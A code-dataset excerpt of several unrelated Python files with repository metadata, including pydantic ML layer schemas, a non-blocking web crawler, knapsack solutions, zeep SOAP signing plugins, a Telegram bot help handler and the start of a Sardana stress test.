] | 36 | 2020-06-08T18:30:56.000Z | 2022-03-07T18:10:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: Li Yuanming
Email: yli056@e.ntu.edu.sg
Date: 1/27/2021
ML model structure definitions.
"""
import abc
import inspect
from enum import Enum
from typing import Optional, Union, Tuple, Dict, OrderedDict
from pydantic import BaseModel, PositiveInt, conint, PositiveFloat, Field, validator
from typing_extensions import Literal
class Operation(Enum):
"""
Operation enum to the layer or connection. There are three kinds of operations: ``'A'`` for add the specific
layer / connection, ``'D'`` for delete the specific layer / connection, ``M`` for modify the layer /
connection, and ``E`` for no operation.
"""
ADD = 'A'
DELETE = 'D'
MODIFY = 'M'
EMPTY = 'E'
class LayerType(Enum):
"""
Enum of the supported layer type. This is to hint which class of layer the provided data is converted to.
"""
LINEAR = 'torch.nn.Linear'
CONV_1D = 'torch.nn.Conv1d'
CONV_2D = 'torch.nn.Conv2d'
RELU = 'torch.nn.ReLU'
TANH = 'torch.nn.Tanh'
BN_1D = 'torch.nn.BatchNorm1d'
BN_2D = 'torch.nn.BatchNorm2d'
MP_1D = 'torch.nn.MaxPool1d'
MP_2D = 'torch.nn.MaxPool2d'
AAP_1D = 'torch.nn.AdaptiveAvgPool1d'
AAP_2D = 'torch.nn.AdaptiveAvgPool2d'
class ModelLayer(BaseModel, abc.ABC):
# noinspection PyUnresolvedReferences
"""
Layer of the model structure.
For layer attributes need to be set :code:`None`, use :code:`'null'` instead. This is for the reason of
updated parameters with value :code:`None` will be viewed as not set. So we take special care to the
desired :code:`None`, replacing it with :code:`'null'`.
Attributes:
op_ (Operation): Operation to the layer.
type_ (LayerType): Indicates the type of this layer. This field also provides hint for :class:`pydantic`
model conversion.
__required_type__ (LayerType): By overriding this attributes, we can use :meth:`check_layer_type` to
provide validation of the sub classes.
"""
op_: Operation
type_: LayerType
__required_type__: LayerType
@classmethod
def parse_layer_obj(cls, layer_obj):
"""
Parse from a ML layer object.
This function will inspect the required parameters to build the layer, and try to obtain its
parameter value from the layer object. The default parameter parser is python default
:code:`getattr`, which assume we can get the value from the same-named attribute of the
layer object.
For parameter cannot parsed with default parser, set a function with the format:
:code:`__{parameter_name}_parser__(layer_obj: Any) -> Any`.
Has the following signature:
Input Arguments:
* layer_obj : Any
The layer object to be parsed.
Return Arguments:
* Any
The parsed value of the given parameter.
TODO:
Signature checking for __{parameter_name}_parser__
"""
kwargs = {'op_': Operation.EMPTY, 'type_': cls.__required_type__}
signature = inspect.signature(layer_obj.__init__)
for param in signature.parameters:
parser = getattr(cls, f'__{param}_parser__', lambda obj: getattr(obj, param))
kwargs[param] = parser(layer_obj)
return cls(**kwargs)
@validator('type_')
def check_layer_type(cls, layer_type: LayerType) -> LayerType: # noqa
"""
Checks layer type value provided is the same as the required value.
This is to generate validator for check :code:`layer_type` field of subclasses of :class:`ModelLayer`.
"""
if layer_type != cls.__required_type__:
raise ValueError(f'Expected {cls.__required_type__} but got {layer_type}')
return layer_type
_LayerType = Union[Linear, Conv1d, Conv2d, ReLU, Tanh, BatchNorm1d, BatchNorm2d, MaxPool1d, MaxPool2d,
AdaptiveAvgPool1d, AdaptiveAvgPool2d]
class Structure(BaseModel):
# noinspection PyUnresolvedReferences
"""
Indicate a ML model structure using a graph data structure.
:attr:`layer` is the graph node, representing a layer of the model. :attr:`connection` is the graph edge,
representing which two layers are connected, and the directions of tensor pass.
Attributes:
layer (OrderedDict[str, _LayerType]): Layer mapping, the key is layer name, and the value is layer
attributes. See :class:`ModelLayer` for reference.
connection (Optional[Dict[str, Dict[str, Operation]]]): The connection (:attr:`connection`) maps
the starting layer name, to the ending layer name with a connection operation.
Examples::
>>> from collections import OrderedDict
>>> # add a nn.Linear layer named 'fc1' with in_features=1024, out_features=10
>>> layer_mapping = OrderedDict({
... 'fc1': LinearLayer(in_features=1024, out_features=10, type_=LayerType.LINEAR, op_=Operation.ADD),
... })
>>> # connection example for add connection from 'conv1' to 'fc1'
>>> connection_mapping = {'conv1': {'fc1': Operation.ADD}}
>>> struct = Structure(layer=layer_mapping, connection=connection_mapping)
>>> print(struct)
layer={'fc1': LinearLayer(in_features=1024, out_features=10, bias=None)}
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}}
>>> # Other than using the model object, we can pass in a plain dictionary,
... # and utilize `Structure.parse_obj`.
>>> structure_data = {
... 'layer': {'fc': {'in_features': 1024, 'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'A'}},
... 'connection': {'conv1': {'fc1': 'A'}}
... }
>>> Structure.parse_obj(structure_data)
Structure(layer={'fc': LinearLayer(in_features=1024, out_features=10, bias=None)},
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}})
"""
layer: OrderedDict[str, _LayerType] = Field(
default_factory=OrderedDict,
example={'fc': {'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'M'}}
)
connection: Optional[Dict[str, Dict[str, Operation]]] = Field(
default_factory=dict,
example={'conv1': {'fc1': 'A'}}
)
| 34.209486 | 115 | 0.669324 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: Li Yuanming
Email: yli056@e.ntu.edu.sg
Date: 1/27/2021
ML model structure definitions.
"""
import abc
import inspect
from enum import Enum
from typing import Optional, Union, Tuple, Dict, OrderedDict
from pydantic import BaseModel, PositiveInt, conint, PositiveFloat, Field, validator
from typing_extensions import Literal
class Operation(Enum):
"""
Operation enum to the layer or connection. There are three kinds of operations: ``'A'`` for add the specific
layer / connection, ``'D'`` for delete the specific layer / connection, ``M`` for modify the layer /
connection, and ``E`` for no operation.
"""
ADD = 'A'
DELETE = 'D'
MODIFY = 'M'
EMPTY = 'E'
class LayerType(Enum):
"""
Enum of the supported layer type. This is to hint which class of layer the provided data is converted to.
"""
LINEAR = 'torch.nn.Linear'
CONV_1D = 'torch.nn.Conv1d'
CONV_2D = 'torch.nn.Conv2d'
RELU = 'torch.nn.ReLU'
TANH = 'torch.nn.Tanh'
BN_1D = 'torch.nn.BatchNorm1d'
BN_2D = 'torch.nn.BatchNorm2d'
MP_1D = 'torch.nn.MaxPool1d'
MP_2D = 'torch.nn.MaxPool2d'
AAP_1D = 'torch.nn.AdaptiveAvgPool1d'
AAP_2D = 'torch.nn.AdaptiveAvgPool2d'
class ModelLayer(BaseModel, abc.ABC):
# noinspection PyUnresolvedReferences
"""
Layer of the model structure.
For layer attributes need to be set :code:`None`, use :code:`'null'` instead. This is for the reason of
updated parameters with value :code:`None` will be viewed as not set. So we take special care to the
desired :code:`None`, replacing it with :code:`'null'`.
Attributes:
op_ (Operation): Operation to the layer.
type_ (LayerType): Indicates the type of this layer. This field also provides hint for :class:`pydantic`
model conversion.
__required_type__ (LayerType): By overriding this attributes, we can use :meth:`check_layer_type` to
provide validation of the sub classes.
"""
op_: Operation
type_: LayerType
__required_type__: LayerType
@classmethod
def parse_layer_obj(cls, layer_obj):
"""
Parse from a ML layer object.
This function will inspect the required parameters to build the layer, and try to obtain its
parameter value from the layer object. The default parameter parser is python default
:code:`getattr`, which assume we can get the value from the same-named attribute of the
layer object.
For parameter cannot parsed with default parser, set a function with the format:
:code:`__{parameter_name}_parser__(layer_obj: Any) -> Any`.
Has the following signature:
Input Arguments:
* layer_obj : Any
The layer object to be parsed.
Return Arguments:
* Any
The parsed value of the given parameter.
TODO:
Signature checking for __{parameter_name}_parser__
"""
kwargs = {'op_': Operation.EMPTY, 'type_': cls.__required_type__}
signature = inspect.signature(layer_obj.__init__)
for param in signature.parameters:
parser = getattr(cls, f'__{param}_parser__', lambda obj: getattr(obj, param))
kwargs[param] = parser(layer_obj)
return cls(**kwargs)
@validator('type_')
def check_layer_type(cls, layer_type: LayerType) -> LayerType: # noqa
"""
Checks layer type value provided is the same as the required value.
This is to generate validator for check :code:`layer_type` field of subclasses of :class:`ModelLayer`.
"""
if layer_type != cls.__required_type__:
raise ValueError(f'Expected {cls.__required_type__} but got {layer_type}')
return layer_type
class Linear(ModelLayer):
in_features: Optional[PositiveInt]
out_features: Optional[PositiveInt]
bias: Optional[bool]
__required_type__ = LayerType.LINEAR
@staticmethod
def __bias_parser__(layer_obj):
return layer_obj.bias is not None
class _ConvNd(ModelLayer, abc.ABC):
in_channels: Optional[PositiveInt]
out_channels: Optional[PositiveInt]
kernel_size: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]]
stride: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]]
padding: Optional[Union[conint(ge=0), Tuple[conint(ge=0), ...]]]
dilation: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]]
groups: PositiveInt
bias: bool
padding_mode: Literal['zeros', 'reflect', 'replicate', 'circular']
@staticmethod
def __bias_parser__(layer_obj):
return layer_obj.bias is not None
class Conv1d(_ConvNd):
__required_type__ = LayerType.CONV_1D
class Conv2d(_ConvNd):
__required_type__ = LayerType.CONV_2D
class ReLU(ModelLayer):
inplace: Optional[bool]
__required_type__ = LayerType.RELU
class Tanh(ModelLayer):
__required_type__ = LayerType.TANH
class _BatchNorm(ModelLayer, abc.ABC):
num_features: Optional[PositiveInt]
eps: Optional[PositiveFloat]
momentum: Optional[Union[PositiveFloat, Literal['null']]]
affine: Optional[bool]
track_running_stats: Optional[bool]
class BatchNorm1d(_BatchNorm):
__required_type__ = LayerType.BN_1D
class BatchNorm2d(_BatchNorm):
__required_type__ = LayerType.BN_2D
class _MaxPool(ModelLayer, abc.ABC):
kernel_size: Union[PositiveInt, Tuple[PositiveInt, ...]]
stride: Optional[Union[PositiveInt, Tuple[PositiveInt, ...]]] = None
padding: Union[conint(ge=0), Tuple[conint(ge=0), ...]] = 0
dilation: Union[PositiveInt, Tuple[PositiveInt, ...]] = 1
return_indices: bool = False
ceil_mode: bool = False
class MaxPool1d(_MaxPool):
__required_type__ = LayerType.MP_1D
class MaxPool2d(_MaxPool):
__required_type__ = LayerType.MP_2D
class _AdaptiveAvgPool(ModelLayer, abc.ABC):
output_size: Union[PositiveInt, Tuple[PositiveInt, ...]]
class AdaptiveAvgPool1d(_AdaptiveAvgPool):
__required_type__ = LayerType.AAP_1D
class AdaptiveAvgPool2d(_AdaptiveAvgPool):
__required_type__ = LayerType.AAP_2D
_LayerType = Union[Linear, Conv1d, Conv2d, ReLU, Tanh, BatchNorm1d, BatchNorm2d, MaxPool1d, MaxPool2d,
AdaptiveAvgPool1d, AdaptiveAvgPool2d]
class Structure(BaseModel):
# noinspection PyUnresolvedReferences
"""
Indicate a ML model structure using a graph data structure.
:attr:`layer` is the graph node, representing a layer of the model. :attr:`connection` is the graph edge,
representing which two layers are connected, and the directions of tensor pass.
Attributes:
layer (OrderedDict[str, _LayerType]): Layer mapping, the key is layer name, and the value is layer
attributes. See :class:`ModelLayer` for reference.
connection (Optional[Dict[str, Dict[str, Operation]]]): The connection (:attr:`connection`) maps
the starting layer name, to the ending layer name with a connection operation.
Examples::
>>> from collections import OrderedDict
>>> # add a nn.Linear layer named 'fc1' with in_features=1024, out_features=10
>>> layer_mapping = OrderedDict({
... 'fc1': LinearLayer(in_features=1024, out_features=10, type_=LayerType.LINEAR, op_=Operation.ADD),
... })
>>> # connection example for add connection from 'conv1' to 'fc1'
>>> connection_mapping = {'conv1': {'fc1': Operation.ADD}}
>>> struct = Structure(layer=layer_mapping, connection=connection_mapping)
>>> print(struct)
layer={'fc1': LinearLayer(in_features=1024, out_features=10, bias=None)}
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}}
>>> # Other than using the model object, we can pass in a plain dictionary,
... # and utilize `Structure.parse_obj`.
>>> structure_data = {
... 'layer': {'fc': {'in_features': 1024, 'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'A'}},
... 'connection': {'conv1': {'fc1': 'A'}}
... }
>>> Structure.parse_obj(structure_data)
Structure(layer={'fc': LinearLayer(in_features=1024, out_features=10, bias=None)},
connection={'conv1': {'fc1': <Operation.ADD: 'A'>}})
"""
layer: OrderedDict[str, _LayerType] = Field(
default_factory=OrderedDict,
example={'fc': {'out_features': 10, 'type_': 'torch.nn.Linear', 'op_': 'M'}}
)
connection: Optional[Dict[str, Dict[str, Operation]]] = Field(
default_factory=dict,
example={'conv1': {'fc1': 'A'}}
)
| 104 | 1,864 | 345 |
b504e628f2cdcc4f38f3aade7b0ba05e7c24f2f0 | 1,646 | py | Python | A_Web_Crawler_With_asyncio_Coroutines/simple_epoll.py | czs0x55aa/500lines_homework | a67a144181afadae387e2889f5ae29565e76cdad | [
"MIT"
] | null | null | null | A_Web_Crawler_With_asyncio_Coroutines/simple_epoll.py | czs0x55aa/500lines_homework | a67a144181afadae387e2889f5ae29565e76cdad | [
"MIT"
] | null | null | null | A_Web_Crawler_With_asyncio_Coroutines/simple_epoll.py | czs0x55aa/500lines_homework | a67a144181afadae387e2889f5ae29565e76cdad | [
"MIT"
] | null | null | null | # coding=utf8
import socket
from selectors2 import DefaultSelector, EVENT_READ, EVENT_WRITE
import time
url = 'xkcd.com'
selector = DefaultSelector()
stopped = False
res = []
@log_time
loop()
| 25.323077 | 78 | 0.58627 | # coding=utf8
import socket
from selectors2 import DefaultSelector, EVENT_READ, EVENT_WRITE
import time
url = 'xkcd.com'
selector = DefaultSelector()
stopped = False
res = []
def log_time(func):
    """Decorator: print the wall-clock seconds a call took.

    Fixes over the original:
    * the wrapped function's return value is now propagated (it used to be
      silently discarded, making the decorator unusable on functions whose
      result matters);
    * ``functools.wraps`` preserves ``__name__``/``__doc__`` of the target.
    """
    from functools import wraps  # local import: keeps the file's import block untouched

    @wraps(func)
    def wrapper(*args, **kw):
        start_time = time.time()
        result = func(*args, **kw)
        # Elapsed wall-clock seconds, printed after the call completes.
        print(time.time() - start_time)
        return result
    return wrapper
class Crawler(object):
    """Minimal non-blocking HTTP fetcher driven by the module-level selector.

    Each instance opens one socket to ``url``:80 and advances through the
    states connect -> send request -> read response via selector callbacks.
    Results are appended to the module-level ``res`` list; the tenth
    completed response flips the module-level ``stopped`` flag.
    """
    def __init__(self, url):
        self.url = url
        self.sock = None
        self.response = b''  # accumulated raw HTTP response bytes
    def fetch(self):
        """Start a non-blocking connect and register the connected callback."""
        self.sock = socket.socket()
        self.sock.setblocking(False)
        try:
            self.sock.connect((self.url, 80))
        except IOError:
            # A non-blocking connect raises "operation in progress"
            # immediately; EVENT_WRITE readiness signals completion.
            pass
        selector.register(self.sock.fileno(), EVENT_WRITE, self.connected)
    def connected(self, key, mask):
        """Socket is writable: send the GET request, then await the reply."""
        selector.unregister(key.fd)
        request = 'GET {} HTTP/1.0\r\nHost: xkcd.com\r\n\r\n'.format(self.url)
        self.sock.send(request.encode('ascii'))
        selector.register(key.fd, EVENT_READ, self.read_response)
    def read_response(self, key, mask):
        """Read one chunk; an empty chunk means the server closed the stream."""
        response = ''  # NOTE(review): unused local, kept byte-identical
        chunk = self.sock.recv(4096)
        if chunk:
            self.response += chunk
        else:
            selector.unregister(key.fd)
            global res, stopped
            res.append(self.response)
            # Stop the event loop once all 10 concurrent fetches finished.
            if len(res) >= 10:
                stopped = True
@log_time
def loop():
    """Kick off 10 concurrent fetches, then run the select/dispatch loop.

    Runs until the module-level ``stopped`` flag is set by the last
    Crawler.read_response callback. Timed by the @log_time decorator.
    """
    for i in range(10):
        crawler = Crawler(url)
        crawler.fetch()
    while not stopped:
        events = selector.select()
        for event_key, event_mask in events:
            callback = event_key.data  # callback registered by Crawler
            callback(event_key, event_mask)
loop()
| 1,273 | 1 | 175 |
e3221b92d4c086b255ccba4f1681b82d8200ae10 | 111 | py | Python | plydata/tidy/__init__.py | has2k1/plydata | d9d022def44ade656fbb39c16d2f7fe45e9e96da | [
"BSD-3-Clause"
] | 247 | 2017-05-06T08:56:29.000Z | 2022-03-16T00:36:35.000Z | plydata/tidy/__init__.py | sthagen/plydata | 7ecbabaae8af68e9d9b094ba1830cf8008746eca | [
"BSD-3-Clause"
] | 28 | 2017-05-19T06:52:32.000Z | 2022-02-17T10:41:47.000Z | plydata/tidy/__init__.py | sthagen/plydata | 7ecbabaae8af68e9d9b094ba1830cf8008746eca | [
"BSD-3-Clause"
] | 14 | 2017-05-14T11:47:16.000Z | 2020-11-20T18:07:49.000Z | from .tidy_verbs import * # noqa
from .. import _get_all_imports
__all__ = _get_all_imports(globals())
| 18.5 | 38 | 0.720721 | from .tidy_verbs import * # noqa
from .. import _get_all_imports
__all__ = _get_all_imports(globals())
| 0 | 0 | 0 |
b0d8d503d87f4c7477bf414c0a0b0d08d59bc8a0 | 321 | py | Python | SoftUni-Basic/conditional_statements/exercises/sum_seconds.py | Darkartt/SoftUni | 23d65ddb9f1e454c9b1338a60dc52f5a64c30bc9 | [
"MIT"
] | null | null | null | SoftUni-Basic/conditional_statements/exercises/sum_seconds.py | Darkartt/SoftUni | 23d65ddb9f1e454c9b1338a60dc52f5a64c30bc9 | [
"MIT"
] | null | null | null | SoftUni-Basic/conditional_statements/exercises/sum_seconds.py | Darkartt/SoftUni | 23d65ddb9f1e454c9b1338a60dc52f5a64c30bc9 | [
"MIT"
] | null | null | null | import math
time_first = int(input())
time_second = int(input())
time_third = int(input())
time_total = time_first + time_second + time_third
minutes = time_total / 60
seconds = time_total % 60
minutes = math.floor(minutes)
if seconds < 10:
print(f"{minutes}:0{seconds}")
else:
print(f"{minutes}:{seconds}") | 17.833333 | 50 | 0.694704 | import math
time_first = int(input())
time_second = int(input())
time_third = int(input())
time_total = time_first + time_second + time_third
minutes = time_total / 60
seconds = time_total % 60
minutes = math.floor(minutes)
if seconds < 10:
print(f"{minutes}:0{seconds}")
else:
print(f"{minutes}:{seconds}") | 0 | 0 | 0 |
1b497317ae49a6c90d84306a0a250f271b310138 | 1,103 | py | Python | arrays/knapsack.py | santoshmano/pybricks | bcb3ab80417e8e896280062494ce6c046329b7e8 | [
"MIT"
] | null | null | null | arrays/knapsack.py | santoshmano/pybricks | bcb3ab80417e8e896280062494ce6c046329b7e8 | [
"MIT"
] | null | null | null | arrays/knapsack.py | santoshmano/pybricks | bcb3ab80417e8e896280062494ce6c046329b7e8 | [
"MIT"
] | null | null | null |
"""
Problem below is i did not know what is the return,
return list of items or return maximum
def knapsack(items,
cur_items_index,
capacity,
weights,
profits,
cur_items,
cur_profit,
cur_weight,
max_items,
max_profit):
if (cur_items_index > len(items)-1) or \
cur_weight < capacity:
return
"""
print(knapsack([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack_memo([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
print(knapsack_memo([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
| 19.017241 | 59 | 0.572983 |
"""
Problem below is i did not know what is the return,
return list of items or return maximum
def knapsack(items,
cur_items_index,
capacity,
weights,
profits,
cur_items,
cur_profit,
cur_weight,
max_items,
max_profit):
if (cur_items_index > len(items)-1) or \
cur_weight < capacity:
return
"""
def knapsack(w, p, c):
    """Return the maximum total profit of a 0/1 knapsack.

    :param w: item weights
    :param p: item profits (parallel to ``w``)
    :param c: knapsack capacity
    """
    return _knapsack(w, p, c, 0)
def _knapsack(w, p, c, i):
    """Recursive helper: best profit using items i.. with capacity c."""
    if i >= len(w) or c <= 0:
        return 0
    # BUG FIX: the original unconditionally added p[i], crediting an item's
    # profit even when w[i] > c (it could never fit). Only branch into
    # "take item i" when it actually fits in the remaining capacity.
    p1 = 0
    if w[i] <= c:
        p1 = p[i] + _knapsack(w, p, c - w[i], i + 1)
    p2 = _knapsack(w, p, c, i + 1)
    return max(p1, p2)
def knapsack_memo(w, p, c):
    """Memoized 0/1 knapsack: maximum total profit within capacity ``c``.

    :param w: item weights
    :param p: item profits (parallel to ``w``)
    :param c: knapsack capacity
    """
    memo = [[None for _ in range(c+1)] for _ in range(len(w))]
    return _knapsack_memo(w, p, c, 0, memo)
def _knapsack_memo(w, p, c, i, memo):
    """Best profit using items i.. with capacity c, cached in ``memo``.

    BUG FIXES vs the original: (1) the memo table was written but never
    read, and the recursion delegated to the non-memoized ``_knapsack``,
    so no subproblem was ever reused; (2) an item's profit was credited
    even when it did not fit (w[i] > c).
    """
    if i >= len(w) or c <= 0:
        return 0
    if memo[i][c] is not None:
        return memo[i][c]  # subproblem already solved
    take = 0
    if w[i] <= c:
        take = p[i] + _knapsack_memo(w, p, c - w[i], i + 1, memo)
    skip = _knapsack_memo(w, p, c, i + 1, memo)
    memo[i][c] = max(take, skip)
    return memo[i][c]
print(knapsack([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack_memo([2, 3, 1, 4], [4, 5, 3, 7], 5))
print(knapsack([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
print(knapsack_memo([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
| 448 | 0 | 92 |
9a86321bc99e59584ded292cf3d45149e72fc968 | 18 | py | Python | alphastarmini/core/rl/__init__.py | liuruoze/mini-AlphaStar | cf9de2507d526a5fb8ef67676aab2ffb92738640 | [
"Apache-2.0"
] | 108 | 2021-02-10T13:24:56.000Z | 2022-03-21T09:58:28.000Z | alphastarmini/core/rl/__init__.py | liuruoze/mini-AlphaStar | cf9de2507d526a5fb8ef67676aab2ffb92738640 | [
"Apache-2.0"
] | 21 | 2021-04-09T18:46:05.000Z | 2022-03-29T02:44:15.000Z | alphastarmini/core/rl/__init__.py | liuruoze/mini-AlphaStar | cf9de2507d526a5fb8ef67676aab2ffb92738640 | [
"Apache-2.0"
] | 19 | 2021-08-03T01:49:02.000Z | 2022-03-30T10:21:13.000Z | print("rl init")
| 9 | 17 | 0.611111 | print("rl init")
| 0 | 0 | 0 |
9a09ebfa2f810688ce7260dec841f4fdfca5030f | 1,418 | py | Python | src/aeat/zeep_plugins.py | initios/aeat-web-services | 3e9533c6f5675df679ea6b42b07304ba938ebcb5 | [
"MIT"
] | 7 | 2018-01-04T10:57:54.000Z | 2021-07-30T09:56:22.000Z | src/aeat/zeep_plugins.py | initios/aeat-web-services | 3e9533c6f5675df679ea6b42b07304ba938ebcb5 | [
"MIT"
] | 18 | 2018-01-04T10:27:01.000Z | 2018-02-20T13:56:19.000Z | src/aeat/zeep_plugins.py | initios/aeat-web-services | 3e9533c6f5675df679ea6b42b07304ba938ebcb5 | [
"MIT"
] | 2 | 2018-11-07T09:07:50.000Z | 2020-12-10T09:47:00.000Z | import logging
from lxml import etree
from zeep import Plugin
from aeat import utils, xml_signing
logger = logging.getLogger(__name__)
class RawXMLPlugin(object):
'''
Stores last request and response as str
'''
| 28.938776 | 84 | 0.669958 | import logging
from lxml import etree
from zeep import Plugin
from aeat import utils, xml_signing
logger = logging.getLogger(__name__)
class SignMessagePlugin(Plugin):
    """zeep plugin that XML-signs every outgoing SOAP request payload.

    # cert_path / key_path: filesystem paths handed to xml_signing.sign
    """
    def __init__(self, cert_path, key_path):
        self.cert_path = cert_path
        self.key_path = key_path
    def egress(self, envelope, http_headers, operation, binding_options):
        '''Sign enveloped message'''
        # envelope[0][0] — presumably the first payload element inside the
        # SOAP Body; TODO(review) confirm against xml_signing.sign's contract.
        args = envelope[0][0], self.cert_path, self.key_path
        signed = xml_signing.sign(*args)
        # Rebuild a fresh envelope around the signed payload; the original
        # envelope object is discarded.
        data = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header/>
        <soapenv:Body>{}</soapenv:Body>
        </soapenv:Envelope>'''.format(
            etree.tostring(signed).decode())
        envelope = etree.fromstring(data)
        return envelope, http_headers
class RawXMLPlugin(object):
    '''
    Stores last request and response as str
    '''
    def __init__(self):
        self.last_sent = None       # last outgoing envelope, serialized to str
        self.last_received = None   # last incoming envelope, serialized to str
    def ingress(self, envelope, http_headers, operation):
        """Capture and log every incoming SOAP envelope, unchanged."""
        self.last_received = utils.lxml_to_string(envelope)
        # Consistency fix: use the module-level ``logger`` (created with
        # getLogger(__name__) at the top of this file) instead of the root
        # logger, so records carry this module's name and honour
        # per-module logging configuration.
        logger.info(self.last_received)
        return envelope, http_headers
    def egress(self, envelope, http_headers, operation, binding_options):
        """Capture and log every outgoing SOAP envelope, unchanged."""
        self.last_sent = utils.lxml_to_string(envelope)
        logger.info(self.last_sent)
        return envelope, http_headers
| 499 | 587 | 103 |
6378199739a1aed1222e18763f9208733ce55447 | 253 | py | Python | handlers/users/help.py | nomadroom/Media_Bot | 59f70d1f1cbda254e6cc0f6a10c88dd05456f797 | [
"MIT"
] | null | null | null | handlers/users/help.py | nomadroom/Media_Bot | 59f70d1f1cbda254e6cc0f6a10c88dd05456f797 | [
"MIT"
] | null | null | null | handlers/users/help.py | nomadroom/Media_Bot | 59f70d1f1cbda254e6cc0f6a10c88dd05456f797 | [
"MIT"
] | 1 | 2020-12-18T08:49:41.000Z | 2020-12-18T08:49:41.000Z | from aiogram import types
from data import config
from loader import dp
from utils.misc import rate_limit
@rate_limit(5, 'help')
@dp.message_handler(commands=['help'])
| 21.083333 | 41 | 0.774704 | from aiogram import types
from data import config
from loader import dp
from utils.misc import rate_limit
@rate_limit(5, 'help')
@dp.message_handler(commands=['help'])
async def help(message: types.Message):
    """Handler for /help: reply with the configured help text (config.HELP_MSG)."""
    await message.answer(config.HELP_MSG)
| 60 | 0 | 22 |
0299cbaad215befbf276c561c700aae7ec4b67af | 400 | py | Python | ProjectEuler/python/prob5.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | ProjectEuler/python/prob5.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | 1 | 2015-03-25T22:35:52.000Z | 2015-03-25T22:35:52.000Z | ProjectEuler/python/prob5.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | # projecteuler.net/problem=5
if __name__ == '__main__':
main()
| 19.047619 | 32 | 0.4625 | # projecteuler.net/problem=5
def main():
answer = SmallestMultiple()
print(answer)
def SmallestMultiple():
num = 1
while True:
found = True
for i in range(1, 20):
if num % i != 0:
found = False
break
if found:
return num
num = num + 1
if __name__ == '__main__':
main()
| 278 | 0 | 50 |
3c03c6604a634b3a6acbad3e149fefccfb24ec00 | 4,251 | py | Python | src/sardana/taurus/core/tango/sardana/test/test_measgrpstress.py | marc2332/sardana | 48dc9191baaa63f6c714d8c025e8f3f96548ad26 | [
"CC-BY-3.0"
] | 43 | 2016-11-25T15:21:23.000Z | 2021-08-20T06:09:40.000Z | src/sardana/taurus/core/tango/sardana/test/test_measgrpstress.py | marc2332/sardana | 48dc9191baaa63f6c714d8c025e8f3f96548ad26 | [
"CC-BY-3.0"
] | 1,263 | 2016-11-25T15:58:37.000Z | 2021-11-02T22:23:47.000Z | src/sardana/taurus/core/tango/sardana/test/test_measgrpstress.py | marc2332/sardana | 48dc9191baaa63f6c714d8c025e8f3f96548ad26 | [
"CC-BY-3.0"
] | 58 | 2016-11-21T11:33:55.000Z | 2021-09-01T06:21:21.000Z | #!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
import os
import uuid
from unittest import TestCase
from tango import DevState
from taurus import Device
from taurus.test.base import insertTest
from .test_pool import is_numerical
from sardana.pool.pooldefs import AcqSynchType
from sardana.taurus.core.tango.sardana.pool import registerExtensions
from sardana.tango.pool.test.base_sartest import SarTestTestCase
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="count with CT (software trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
| 43.377551 | 78 | 0.646201 | #!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
